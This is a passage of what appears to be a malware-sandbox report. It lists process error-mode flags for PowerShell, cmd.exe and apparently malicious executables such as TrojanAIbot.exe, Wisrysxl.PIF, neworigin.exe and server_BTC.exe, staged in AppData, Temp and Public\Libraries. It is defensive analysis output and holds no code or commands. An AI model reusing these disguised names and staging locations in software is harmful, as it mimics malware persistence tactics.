Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
